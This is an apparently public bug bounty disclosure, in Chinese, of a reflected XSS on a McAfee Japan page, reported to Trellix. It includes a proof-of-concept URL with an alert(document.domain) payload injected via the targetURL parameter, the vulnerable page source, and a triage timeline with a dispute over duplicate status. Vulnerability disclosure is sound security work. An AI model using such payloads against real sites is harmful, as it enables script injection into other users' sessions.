上的RXSS

报告人: lemonoftroy 报告对象: Trellix 报告状态: 已解决/已公开 严重性: 中等 (4.7) 弱点: 反射型跨站脚本 (XSS) 披露日期: 2025年12月19日

摘要

你好！我发现了另一个存在XSS漏洞的子域名，以下是复现步骤…

已验证的浏览器:

Chrome 87
Firefox

复现步骤

访问以下URL：https://jp.mcafee.com/apps/mdm/jp/3.0_asp/scripting.asp?targetURL=%22);alert(document.domain);//
点击按钮。

截图:

相关代码:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


<html>
<head>
    <title>McAfee: スクリプトの有効化</title>
    <link rel="stylesheet" type="text/css" href="http://jp.mcafee.com/common/stylesheets/general.css">
</head>

    <script language=javascript>
    function onClickBack()
    {
        window.location.replace ("");alert(document.domain);//");
    }
    </script>

<body>

此致！

影响: XSS

时间线

2020年12月29日，22:18 UTC - lemonoftroy 向 Trellix 提交了报告。
2020年12月30日，08:16 UTC - h1_analyst_caesar 将状态更改为 已分类 (Triaged)。

你好 @lemonoftroy, 感谢您的提交！我们已能够验证您的报告，并已将其提交给相应的修复团队进行审查。他们将告知我们此报告的最终裁决，以及是否/何时会实施修复。请注意，状态和严重性可能会发生变化。此致, @turtle_shell
2020年12月30日，08:17 UTC - h1_analyst_caesar 将严重性从“中”更新为“中 (4.7)”。
2020年12月30日，09:11 UTC - ssarangi 发表评论。

感谢报告此错误 @lemonoftroy。我们正与团队合作解决此问题。最好的, @ssarangi
2022年11月29日，17:14 UTC - zli (Trellix 员工) 关闭报告并将状态更改为 重复 (Duplicate)。

我们已将同一报告者的相同根本原因问题在另一份报告中标记为已解决，现在关闭这些重复的报告。
2023年1月13日，20:53 UTC - lemonoftroy 发表评论。

你好 @zli, 你能好心将这些报告标记为“已解决”吗？考虑到已经过去了两年多，没有赏金，而且当时也没有反馈（所以我本可以为发现的所有不同国家创建一个报告），你的操作让我损失了超过100点声望… 谢谢
2023年1月17日，14:45 UTC - zli (Trellix 员工) 重新开启了此报告。
2023年1月17日，14:45 UTC - zli (Trellix 员工) 关闭报告并将状态更改为 已解决 (Resolved)。
2025年11月19日，11:04 UTC - lemonoftroy 请求公开此报告。
大约11天前 - 此报告已被公开。